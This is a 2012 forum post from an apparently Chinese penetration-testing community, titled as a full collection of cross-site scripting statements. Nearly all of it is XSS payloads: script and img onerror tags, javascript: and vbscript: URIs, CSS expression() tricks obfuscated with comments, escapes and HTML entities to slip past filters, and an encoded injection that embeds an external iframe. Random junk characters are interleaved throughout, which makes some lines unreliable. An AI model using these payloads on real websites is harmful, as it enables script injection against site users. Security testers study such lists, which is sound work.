中国网络渗透测试联盟

标题: 跨站语句大全 [打印本页]

作者: admin    时间: 2012-9-13 17:15
标题: 跨站语句大全
<script>alert("跨站")</script>    (最常用)
" {* `2 p, H3 K1 H4 h0 g* X<img scr=javascript:alert("跨站")></img>
2 \, s/ v( V6 i<img scr="javascrip&#116&#58 alert(/跨站/)></img>
6 u& _3 r% F3 a. L  f  \! }: M- y<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
! @. _& w% t/ w& d<img scr="#" onerror=alert(/跨站/)></img>
; x) F: C! w' Z4 ^# Y- J/ m) v' y<img scr="#" style="xss:expression(alert(/xss/));"></img>
$ r- Y9 v' A5 L+ L8 v0 p9 `<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
" p. {* K" ?5 n& N6 j4 Z8 [7 l<img src=vbscript:msgbox ("xss")></img>
) d8 x2 q2 b& s) N6 V<style> input {left:expression (alert('xss'))}</style>
# P: R" ?0 x4 C6 E* Q<div style={left:expression (alert('xss'))}></div>
" V5 [0 S" |3 I<div style={left:exp/* */ression (alert('xss'))}></div>% Y6 o! y0 n9 E. U( x
<div style={left:\0065\0078ression (alert('xss'))}></div>+ z+ u" S% G9 G* b
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div># g+ L. _" J. w
unicode <div style="{left:expRessioN (alert('xss'))}">
. {  k, H( S5 |4 A& k0 N
' I9 {8 @7 |9 U( G+ d1 @; A" o"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["% D( d3 N% }6 ~% h





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2